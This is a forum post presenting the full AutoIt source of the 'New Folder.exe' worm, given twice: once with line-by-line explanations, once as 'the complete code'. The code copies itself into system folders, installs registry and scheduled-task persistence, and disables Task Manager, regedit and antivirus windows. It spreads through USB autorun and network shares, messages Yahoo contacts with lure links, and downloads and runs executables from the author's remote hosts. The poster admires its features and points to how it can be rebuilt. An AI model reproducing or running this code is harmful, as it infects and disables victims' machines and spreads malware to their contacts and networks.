AutoIt code of the New Folder.exe virus, with an explanation of the code

Posted 11-07-2012, 04:12 AM   #1
windows 8

In the name of God, the Most Gracious, the Most Merciful.
This is the code of a well-known virus called New Folder.exe.
First I will post the code together with its explanation.

$name = "SSVICHOSST"; name of the virus
$setting = "setting"; the virus file
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
Copies itself into the main folder
FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
Here it protects itself by making itself hidden, read-only or a system file
FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
Copies itself to the system folder
FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
Protects itself using the previous methods
FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
Creates registry entries so that it runs automatically with Windows
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","****************l","R EG_RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","Yahoo Messengger","; disables Folder Options, which is why you cannot see it in the menu bar
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NofolderOptions"," ; disables Task Manager
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableTaskMgr",; disables the registry editor
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableRegistryTools",; creates a schedule so that it runs automatically at the set time
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Serv ices\Schedule","AtTaskMaxHours","REG__RunDOS ("AT /delete /yes")
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
createini()
update()
sendmess()
Reads the shared folders, and this way it spreads itself over the network
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\If $a ="" Then
copynetwork ()
EndIf
If $a "" Then
If FileExists ($a)=0 Then
copynetwork()
EndIf
EndIf
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
Copies itself to every flash drive connected to the computer
While (1)
killprocess()
copyusb()
If @HOUR = $toigioupdate Then
update()
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
EndIf
If @MIN = $toigio Then
sendmess()
EndIf
WEnd
Downloads the settings from the author's website; God knows best, and if there is another idea behind it, please add it
Func downloadurl()
$settingurl="http://nhatquanglan3.t35.com"
If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
Sleep (1000)
$downloaded="success"
$settingurl1 = "http://nhatquanglan4.t35.com"
If IniRead (@SystemDir & "\" & $setting & $ini,"setting","downloaded","") $downloaded Then
If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
EndIf
FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
EndFunc
Updating the virus
Func update()
downloadurl()
$website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
$check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
$check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
$check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
$size01 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size01",""))
$size02 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size02",""))
$size03 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size03",""))
If $check01 "" Then
If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check01 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check01 & $exe))/1024>=$size01 Then
FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
Run (@SystemDir & "\" & $check01 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check02 "" Then
If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check02 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check02 & $exe))/1024>=$size02 Then
FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
Run (@SystemDir & "\" & $check02 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check03 "" Then
If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check03 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check03 & $exe))/1024>=$size03 Then
FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
Run (@SystemDir & "\" & $check03 & $exe)
EndIf
EndIf
EndIf
EndIf
$toigioupdate = @HOUR + 2
If $toigioupdate >12 Then
$toigioupdate = $toigioupdate -12
EndIf
EndFunc
Creates a message to send to all the e-mail contacts in Yahoo
Func sendmess()
$myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
If $myweb = "" Then
$myweb = "http://nhatquanglan1.0catch.com"
EndIf
Dim $tin [10]
$tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
If $tin[0] = "" Then
$tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
EndIf
$tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
If $tin[1] = "" Then
$tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
If $tin[2] = "" Then
$tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
If $tin[3] = "" Then
$tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
EndIf
$tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
If $tin[4] = "" Then
$tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
EndIf
$tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
If $tin[5] = "" Then
$tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo EndIf
$tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
If $tin[6] = "" Then
$tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung EndIf
$tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
If $tin[7] = "" Then
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan EndIf
$tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
If $tin[8] = "" Then
$tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo EndIf
$tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
If $tin[9] = "" Then
$tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang EndIf
Selects all the e-mail contacts in Yahoo to send them the address of the site to download from
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut ($tin[$ngaunhien])
BlockInput (1)
WinActivate ($tieude)
Send ("!m")
Send ("un")
Send ("^v {ENTER}{ENTER}")
Send ("^m")
Send ("{DOWN}")
Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
Send ("{ENTER}")
Send ("^v {ENTER}")
BlockInput (0)
EndIf
$toigio=@MIN + 30
If $toigio>60 Then
$toigio=$toigio-60
EndIf
EndFunc
Function to kill the antivirus, Task Manager, the registry editor and the DOS tool
Func killprocess()
If WinExists ("Bkav2006") Then
WinClose ("Bkav2006")
RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run","BkavFw")
EndIf
If WinExists ("System Configuration") Then
WinClose ("System Configuration")
EndIf
If WinExists ("Registry") Then
WinClose ("Registry")
EndIf
If WinExists ("Windows Task") Then
WinClose ("Windows Task")
EndIf
If WinExists ("[FireLion]") Then
RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","IEProtection")
Shutdown (2)
EndIf
If ProcessExists ("cmd.exe") then
ProcessClose ("cmd.exe")
EndIf
EndFunc
Function to copy itself to the flash drive
Func copyusb()
$usb = DriveGetDrive("REMOVABLE")
If NOT @error Then
Dim $odia[6]
$odia[1]=""
For $i=1 To $usb[0]
$odia[$i-1]=$usb[$i]
Next
If $odia[0] "A:" Then
If $odia[0]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[0] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[0] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[0] & "\autorun.inf",0)
FileSetAttrib ($odia[0] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[0])
EndIf
EndIf
If $odia[0]="A:" Then
If $odia[1]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[1] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[1] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[1] & "\autorun.inf",0)
FileSetAttrib ($odia[1] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[1])
EndIf
EndIf
EndIf
EndFunc
Function to search and move itself to the system folder
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file "." Or $file "..") Then
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
Function to move itself to the network folder
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\If @error Then ExitLoop
$read = StringReplace ($read,"/","\")
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
If $checkcopy =1 Then
FileCopy (@SystemDir & "\" & $name & $exe,$mang[$i] & "\" & $name & $exe,0)
FileCopy (@SystemDir & "\autorun.ini",$mang[$i] & "\autorun.inf",1)
FileSetAttrib ($mang[$i] & "\autorun.inf","+RSH")
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\EndFunc
Function to create the autorun file
Func createini()
IniWrite (@SystemDir & "\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************lexe cute",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l\Open\c ommand",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l","Open ")
Sleep (1)
FileSetAttrib (@SystemDir & "\autorun.ini","+RSH")
EndFunc

That is a full explanation of the virus and how it runs.

Second, and most important, the complete code.
Code:
; ----------------------------------------------------------------------------
;
; New Folder.exe Code analyzed By Koudelka... Lebanese By Nature...Proud By Choice
; Note: You can rebuild this script using AutoIt program from http://www.autoitscript.com/autoit3/
; First part of this code is to add functions used in the virus like _ProcessGetName and _ProcessGetPriority
;
; ----------------------------------------------------------------------------
; ----------------------------------------------------------------------------
;
; Description: Functions that assist with process management.
;
; ------------------------------------------------------------------------------
;================================================= ==============================
;
; Description - Returns a string containing the process name that belongs to a given PID.
; Syntax - _ProcessGetName( $iPID )
; Parameters - $iPID - The PID of a currently running process
; Requirements - None.
; Return Values - Success - The name of the process
; Failure - Blank string and sets @error
; 1 - Process doesn't exist
; 2 - Error getting process list
; 3 - No processes found
; Notes - Supplementary to ProcessExists().
;================================================= ==============================
Func _ProcessGetName($i_PID)
If Not ProcessExists($i_PID) Then
SetError(1)
Return ''
EndIf
Local $a_Processes = ProcessList()
If Not @error Then
For $i = 1 To $a_Processes[0][0]
If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
Next
EndIf
SetError(1)
Return ''
EndFunc ;==>_ProcessGetName
;================================================= ==============================
;
; Function Name: _ProcessGetPriority()
; Description: Get the priority of an open process
; Parameter(s): $vProcess - PID or name of a process.
; Requirement(s): AutoIt Beta v3.1.1.61+
; kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corressponding to
; the processes's priority:
; 0 - Idle/Low
; 1 - Below Normal (Not supported on Windows 95/98/ME)
; 2 - Normal
; 3 - Above Normal (Not supported on Windows 95/98/ME)
; 4 - High
; 5 - Realtime
; On Failure: Returns -1 and sets @Error to 1
;
;================================================= ==============================
;
Func _ProcessGetPriority($vProcess)
Local $i_PID = ProcessExists($vProcess)
If Not $i_PID Then
SetError(1)
Return -1
EndIf
Local $hDLL = DllOpen('kernel32.dll')
Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0])
DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
DllClose($hDLL)
Switch $aPriority[0]
Case 0x00000040
Return 0
Case 0x00004000
Return 1
Case 0x00000020
Return 2
Case 0x00008000
Return 3
Case 0x00000080
Return 4
Case 0x00000100
Return 5
Case Else
SetError(1)
Return -1
EndSwitch
EndFunc ;==>_ProcessGetPriority
;================================================= ==============================
;
; Description: Executes a DOS command in a hidden command window.
; Syntax: _RunDOS( $sCommand )
; Parameter(s): $sCommand - Command to execute
; Requirement(s): None
; Return Value(s): On Success - Returns the exit code of the command
; On Failure - Depends on RunErrorsFatal setting
;
;================================================= ==============================
Func _RunDOS($sCommand)
Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS
; ----------------------------------------------------------------------------
;
; ----------------------------------------------------------------------------
; ----------------------------------------------------------------------------
; Virus Code Start From here
; ----------------------------------------------------------------------------
 
#NoTrayIcon ; used to hide the virus from the tray icon
$name = "SSVICHOSST" ; name of the virus
$setting = "setting" ; setting file used later
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
; Copy itself to system directory
FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
; Copy itself to windows directory
FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
; Create registry keys so it runs with Windows automatically
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","****************l","R EG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
; Disable Folder Options so you can't see it in the Tools menu of Explorer
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NofolderOptions"," REG_DWORD",1)
; Disable Task Manager (Ctrl+Alt+Delete)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)
; Disable regedit
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)
; Make schedule to run the virus automatically at specified time
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Serv ices\Schedule","AtTaskMaxHours","REG_DWORD",0)
_RunDOS ("AT /delete /yes")
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
createini()
update()
sendmess()
; Read shared folders from the registry so that it can copy itself there
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\Shares","sha red")
If $a ="" Then
copynetwork ()
EndIf
If $a "" Then
If FileExists ($a)=0 Then
copynetwork()
EndIf
EndIf
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
; Copy itself to Flash memory to infect any usb attached to the computer
While (1)
killprocess()
copyusb()
If @HOUR = $toigioupdate Then
update()
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
EndIf
If @MIN = $toigio Then
sendmess()
EndIf
WEnd
; It downloads settings from the virus author's website. I didn't study this too much, but it's a really nice idea
Func downloadurl()
$settingurl="http://nhatquanglan3.t35.com"
If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
Sleep (1000)
$downloaded="success"
$settingurl1 = "http://nhatquanglan4.t35.com"
If IniRead (@SystemDir & "\" & $setting & $ini,"setting","downloaded","") $downloaded Then
If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
EndIf
FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
EndFunc
; Update the virus. Didn't I tell you, nice idea
Func update()
downloadurl()
$website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
$check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
$check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
$check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
$size01 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size01",""))
$size02 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size02",""))
$size03 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size03",""))
If $check01 "" Then
If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check01 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check01 & $exe))/1024>=$size01 Then
FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
Run (@SystemDir & "\" & $check01 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check02 "" Then
If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check02 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check02 & $exe))/1024>=$size02 Then
FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
Run (@SystemDir & "\" & $check02 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check03 "" Then
If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check03 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check03 & $exe))/1024>=$size03 Then
FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
Run (@SystemDir & "\" & $check03 & $exe)
EndIf
EndIf
EndIf
EndIf
$toigioupdate = @HOUR + 2
If $toigioupdate >12 Then
$toigioupdate = $toigioupdate -12
EndIf
EndFunc
; Create a message to send to all your contacts in Yahoo Messenger
Func sendmess()
$myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
If $myweb = "" Then
$myweb = "http://nhatquanglan1.0catch.com"
EndIf
Dim $tin [10]
$tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
If $tin[0] = "" Then
$tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
EndIf
$tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
If $tin[1] = "" Then
$tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
If $tin[2] = "" Then
$tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
If $tin[3] = "" Then
$tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
EndIf
$tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
If $tin[4] = "" Then
$tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
EndIf
$tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
If $tin[5] = "" Then
$tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " &$myweb &" "
EndIf
$tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
If $tin[6] = "" Then
$tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $myweb & " "
EndIf
$tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
If $tin[7] = "" Then
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $myweb & " "
EndIf
$tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
If $tin[8] = "" Then
$tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $myweb & " "
EndIf
$tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
If $tin[9] = "" Then
$tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $myweb & " "
EndIf
; Select all your contacts in Yahoo Messenger and send them the message created above with the website to download the virus
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut ($tin[$ngaunhien])
BlockInput (1)
WinActivate ($tieude)
Send ("!m")
Send ("un")
Send ("^v {ENTER}{ENTER}")
Send ("^m")
Send ("{DOWN}")
Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
Send ("{ENTER}")
Send ("^v {ENTER}")
BlockInput (0)
EndIf
$toigio=@MIN + 30
If $toigio>60 Then
$toigio=$toigio-60
EndIf
EndFunc
; Function to kill antivirus, registry, task manager, command (cmd) in case they are running
Func killprocess()
If WinExists ("Bkav2006") Then
WinClose ("Bkav2006")
RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run","BkavFw")
EndIf
If WinExists ("System Configuration") Then
WinClose ("System Configuration")
EndIf
If WinExists ("Registry") Then
WinClose ("Registry")
EndIf
If WinExists ("Windows Task") Then
WinClose ("Windows Task")
EndIf
If WinExists ("[FireLion]") Then
RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","IEProtection")
Shutdown (2)
EndIf
If ProcessExists ("cmd.exe") then
ProcessClose ("cmd.exe")
EndIf
EndFunc
; Function to copy itself to usb
Func copyusb()
$usb = DriveGetDrive("REMOVABLE")
If NOT @error Then
Dim $odia[6]
$odia[1]=""
For $i=1 To $usb[0]
$odia[$i-1]=$usb[$i]
Next
If $odia[0] "A:" Then
If $odia[0]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[0] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[0] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[0] & "\autorun.inf",0)
FileSetAttrib ($odia[0] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[0])
EndIf
EndIf
If $odia[0]="A:" Then
If $odia[1]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[1] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[1] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[1] & "\autorun.inf",0)
FileSetAttrib ($odia[1] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[1])
EndIf
EndIf
EndIf
EndFunc
; Function to search and copy itself to windows directory
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file "." Or $file "..") Then
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
; Function to copy itself to network folders
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\Shares",$i)
If @error Then ExitLoop
$read = StringReplace ($read,"/","\")
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
If $checkcopy =1 Then
FileCopy (@SystemDir & "\" & $name & $exe,$mang[$i] & "\" & $name & $exe,0)
FileCopy (@SystemDir & "\autorun.ini",$mang[$i] & "\autorun.inf",1)
FileSetAttrib ($mang[$i] & "\autorun.inf","+RSH")
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\Shares","sha red","REG_SZ",$mang[$i-1] & "\New Folder.exe")
EndFunc
; Create Autorun.inf (it's now .ini but it will be renamed to .inf) which is copied to the flash memory to make the virus autorun whenever the flash is inserted
Func createini()
IniWrite (@SystemDir & "\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************lexe cute",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l\Open\c ommand",$name & $exe)
